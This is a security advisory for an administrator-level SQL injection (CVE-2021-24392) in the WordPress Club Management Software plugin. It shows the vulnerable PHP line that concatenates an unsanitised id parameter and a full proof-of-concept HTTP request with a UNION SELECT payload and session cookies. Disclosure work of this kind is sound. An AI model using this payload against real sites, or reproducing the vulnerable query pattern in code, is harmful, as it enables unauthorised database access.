Wp Plugin Club Management Software

Plugin Details

Plugin Name: wp-plugin : club-management-software
Effected Version : 1 (and most probably lower version's if any)
Vulnerability : Injection
Minimum Level of Access Required : Administrator
CVE Number : CVE-2021-24392
Identified by : Syed Sheeraz Ali
WPScan Reference URL

Disclosure Timeline

Technical Details

Vulnerable File: admin/section/swiftbook-add-email-templates.php#30

Vulnerable Code block and parameter:

Administrator level SQLi for parameter id admin/section/swiftbook-add-email-templates.php#30

30:        $template = $wpdb->get_row("SELECT * FROM `$table_emailtemplate` WHERE `et_id`=" . $_GET['id']);

PoC Screenshots

screenshot 1 screenshot 2

Exploit

GET /wp-admin/admin.php?page=swiftbook_add_email_template&id=0 UNION ALL SELECT NULL,NULL,user(),NULL,NULL-- - HTTP/1.1
Host: 172.28.128.50
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-GPC: 1
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: wordpress_232395f24f6cff47569f2739c21385d6=admin%7C1620726112%7CswM2ule4AKH1D9P6ARH66iCAXAsLU4qMaspNCuUmiPI%7Ccbac3b5e282c4133c3b8ed967d2f86e39589bda3013bb0bbd80dce02def1caf8; wordpress_test_cookie=WP%20Cookie%20check; tk_ai=woo%3AKa6IHGxtReqSiNAwAVhqbvCQ; wordpress_logged_in_232395f24f6cff47569f2739c21385d6=admin%7C1620726112%7CswM2ule4AKH1D9P6ARH66iCAXAsLU4qMaspNCuUmiPI%7C78dbf8517e6d99fee9828d0fc243b12a05b043d183208e3b967d0becd946f23d; wp-settings-1=mfold%3Do%26editor%3Dtinymce; wp-settings-time-1=1620553312
Connection: close
<div class="variable-list">
<h4>Replace following</h4>
<ul>
<li>Bob@localhost = {bob@localhost}</li> </ul>
</div>